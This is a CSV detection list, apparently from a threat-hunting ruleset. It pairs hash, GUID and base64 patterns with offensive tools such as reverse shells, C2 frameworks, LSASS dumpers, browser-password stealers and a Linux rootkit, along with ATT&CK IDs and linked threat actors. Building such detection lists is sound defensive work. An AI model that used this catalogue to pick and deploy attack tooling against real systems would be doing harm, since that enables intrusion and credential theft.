"*f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a*",".{0,1000}f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","43725"
"*f0e0e7cd303662f47ec9f5df7778faa0ff2a15110d21f5afbea031c6b02f8d9b*",".{0,1000}f0e0e7cd303662f47ec9f5df7778faa0ff2a15110d21f5afbea031c6b02f8d9b.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","43726"
"*f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88*",".{0,1000}f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","43727"
"*f0e56c67cdf3a1f4dfc21bcff9d9e760e72fe34ebd32ab7ea0f1be9fc7e05e75*",".{0,1000}f0e56c67cdf3a1f4dfc21bcff9d9e760e72fe34ebd32ab7ea0f1be9fc7e05e75.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43728"
"*f0f1873d2b61cd03c1daa52ec0cb279676b118507c9031e26d132b8f4187b2bd*",".{0,1000}f0f1873d2b61cd03c1daa52ec0cb279676b118507c9031e26d132b8f4187b2bd.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","43729"
"*f0f81571b19a8af0b074b80fc965fef5c2afa705143cade50786d944c24a0494*",".{0,1000}f0f81571b19a8af0b074b80fc965fef5c2afa705143cade50786d944c24a0494.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43730"
"*f0f8f8de178f91de8fe054b6450fa0d2291ad7693035f2c52df800e9168fb22d*",".{0,1000}f0f8f8de178f91de8fe054b6450fa0d2291ad7693035f2c52df800e9168fb22d.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#filehash","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","43731"
"*f0fc4517a1a74f1922e41886cc4584c7683f7726111e40f03b26edc6bd9c6642*",".{0,1000}f0fc4517a1a74f1922e41886cc4584c7683f7726111e40f03b26edc6bd9c6642.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43732"
"*f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5*",".{0,1000}f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#base64 #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","43733"
"*f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAzgAAAAAAAAAkAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdSxwQkAgAjKUiJ5moQWmoxWA8FajJYDwVIMfZqK1gPBUiXagNeSP*",".{0,1000}f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAzgAAAAAAAAAkAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdSxwQkAgAjKUiJ5moQWmoxWA8FajJYDwVIMfZqK1gPBUiXagNeSP.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#base64 #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","43734"
"*f108ce909b11c42406540ae67c339f22fd9842db9ecdc5765bcd2b35f5723198*",".{0,1000}f108ce909b11c42406540ae67c339f22fd9842db9ecdc5765bcd2b35f5723198.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","43735"
"*f109966b6fc1f0ea412a05078baaa79667529be0a387070da7c458a914a07e8e*",".{0,1000}f109966b6fc1f0ea412a05078baaa79667529be0a387070da7c458a914a07e8e.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","43736"
"*f116626cb8bd2787d19bbb0dbf578cbd09093e19ab27911beb1f61d46abb3845*",".{0,1000}f116626cb8bd2787d19bbb0dbf578cbd09093e19ab27911beb1f61d46abb3845.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43737"
"*f1168b6e2d5fc6d6edba534cee25fc9a4d9b28eca6435a9111449ba617626882*",".{0,1000}f1168b6e2d5fc6d6edba534cee25fc9a4d9b28eca6435a9111449ba617626882.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43738"
"*f118a70fa7b02b858bb4fffb96d9a861e4b02f62df054a0d69854449682c8f85*",".{0,1000}f118a70fa7b02b858bb4fffb96d9a861e4b02f62df054a0d69854449682c8f85.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43739"
"*f121ccc497eca1f3692c9ac8e8be1c1c1a4be250d05f7a23e2f71b8240da1ea5*",".{0,1000}f121ccc497eca1f3692c9ac8e8be1c1c1a4be250d05f7a23e2f71b8240da1ea5.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","43741"
"*f12a335a790c4d47c3eb5182ec43afd523dc6ab354645f0167fe7206073b61e5*",".{0,1000}f12a335a790c4d47c3eb5182ec43afd523dc6ab354645f0167fe7206073b61e5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43742"
"*f13668c26c13b4e0a8a56ffbc758331f311bcb033c1c74b1711a2258d6ed2e22*",".{0,1000}f13668c26c13b4e0a8a56ffbc758331f311bcb033c1c74b1711a2258d6ed2e22.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43744"
"*f140d5c67e7a151d9bba6d8c456dd44004f14056acd3257aa2203b30e959ef39*",".{0,1000}f140d5c67e7a151d9bba6d8c456dd44004f14056acd3257aa2203b30e959ef39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43749"
"*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43750"
"*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43751"
"*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43752"
"*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43753"
"*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43754"
"*f1452a47c21f37e9d581f706dce8862a1d4d045033470c4080809fb4a205e42c*",".{0,1000}f1452a47c21f37e9d581f706dce8862a1d4d045033470c4080809fb4a205e42c.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","43755"
"*f150333a3943f2c7398e0dd3f97a2cb3f1c1653a220785a977ba9a7ff692dab1*",".{0,1000}f150333a3943f2c7398e0dd3f97a2cb3f1c1653a220785a977ba9a7ff692dab1.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#filehash","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","43757"
"*f1525ffa97500a9aa64138541d1e91f403e494d8a6eef7bcb1f1de7e8261755e*",".{0,1000}f1525ffa97500a9aa64138541d1e91f403e494d8a6eef7bcb1f1de7e8261755e.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","#filehash","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","43759"
"*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*",".{0,1000}F1527C49\-CA1F\-4994\-BB9D\-E20DD2C607FD.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#GUIDproject","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","43760"
"*f154fc90b680ec716ea189245556b03b214e829a64b3f4ca23ca78beb4701171*",".{0,1000}f154fc90b680ec716ea189245556b03b214e829a64b3f4ca23ca78beb4701171.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43762"
"*f15785e3f3b824872a6b9dd8c550886179d3e636f0f1939d2b45c411701c72f8*",".{0,1000}f15785e3f3b824872a6b9dd8c550886179d3e636f0f1939d2b45c411701c72f8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","43763"
"*f15b1b50831974a8a4ac09cce5b7b9f5cc71404ee4cabe67ee2f95e890419d3c*",".{0,1000}f15b1b50831974a8a4ac09cce5b7b9f5cc71404ee4cabe67ee2f95e890419d3c.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","43764"
"*f15f6182ca98bb702c2578efc0aef6e35d8237b89a00a588364bb7e068b132fa*",".{0,1000}f15f6182ca98bb702c2578efc0aef6e35d8237b89a00a588364bb7e068b132fa.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","#filehash","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","43765"
"*f15fa262d8f920942732454e30ba9d97487bfa6249e9ac561be57d567580f63d*",".{0,1000}f15fa262d8f920942732454e30ba9d97487bfa6249e9ac561be57d567580f63d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","43766"
"*F1653F20-D47D-4F29-8C55-3C835542AF5F*",".{0,1000}F1653F20\-D47D\-4F29\-8C55\-3C835542AF5F.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#GUIDproject","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","43768"
"*F1653F20-D47D-4F29-8C55-3C835542AF5F*",".{0,1000}F1653F20\-D47D\-4F29\-8C55\-3C835542AF5F.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","0","#GUIDproject","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","43769"
"*f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08*","f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","43770"
"*f17e974041fcd977a7aa0171c31af287be975d6095d91ed5c5773446d7379bbc*",".{0,1000}f17e974041fcd977a7aa0171c31af287be975d6095d91ed5c5773446d7379bbc.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43773"
"*f1802e0de6eea66fde52537a15d0a2972d53b74e5a2cb016f6722daec68c97ba*",".{0,1000}f1802e0de6eea66fde52537a15d0a2972d53b74e5a2cb016f6722daec68c97ba.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43774"
"*f1820351dc1390a481acee014d8c630903a5d83f3338f81fe31e86476432513e*",".{0,1000}f1820351dc1390a481acee014d8c630903a5d83f3338f81fe31e86476432513e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43775"
"*f18594dd9281bf3b8450f6528e209afca27b24998d653077f1e371126ea0aeea*",".{0,1000}f18594dd9281bf3b8450f6528e209afca27b24998d653077f1e371126ea0aeea.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","43776"
"*f187ab7396fc3a96e9549316af3e8eaf9ecdca41adec82d98ca52e67974811a8*",".{0,1000}f187ab7396fc3a96e9549316af3e8eaf9ecdca41adec82d98ca52e67974811a8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43778"
"*f18bc0dae72814ff2e076c2b61846a35d00575c4e1554f74a4a70a036a15f9c5*",".{0,1000}f18bc0dae72814ff2e076c2b61846a35d00575c4e1554f74a4a70a036a15f9c5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","43779"
"*f19bd04ee2c9271e758bc21fc681f0a08ebf441a70b3221ccf5d201d5ae70f9b*",".{0,1000}f19bd04ee2c9271e758bc21fc681f0a08ebf441a70b3221ccf5d201d5ae70f9b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","43784"
"*f1a21c50b4c315780c16c0777f84b5fa407a98acc014cf68ff05e3c007ce2f0c*",".{0,1000}f1a21c50b4c315780c16c0777f84b5fa407a98acc014cf68ff05e3c007ce2f0c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","43785"
"*f1a3a780227dec46aa938096d1a8d8f6240e711d757a25aaec0f6c6adf0a495a*",".{0,1000}f1a3a780227dec46aa938096d1a8d8f6240e711d757a25aaec0f6c6adf0a495a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43786"
"*f1a6e3b13ff54c97ac5b84805277fd033f45ad2419b7f4322bd30adf72179743*",".{0,1000}f1a6e3b13ff54c97ac5b84805277fd033f45ad2419b7f4322bd30adf72179743.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","43787"
"*f1bdbea3a5f869e83b52e6284e24d76049a3505492a8b7176cb07f2ad03cbe2b*",".{0,1000}f1bdbea3a5f869e83b52e6284e24d76049a3505492a8b7176cb07f2ad03cbe2b.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","43791"
"*f1c145f20ea495e5d9df00513b6fcb05b2dd7e0f7f126626372c6d65b25ddf76*",".{0,1000}f1c145f20ea495e5d9df00513b6fcb05b2dd7e0f7f126626372c6d65b25ddf76.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43792"
"*f1c61181201c45d01a05a4c00d6e2f392e4afcf7c4133f71151ef6ad20887d17*",".{0,1000}f1c61181201c45d01a05a4c00d6e2f392e4afcf7c4133f71151ef6ad20887d17.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","43794"
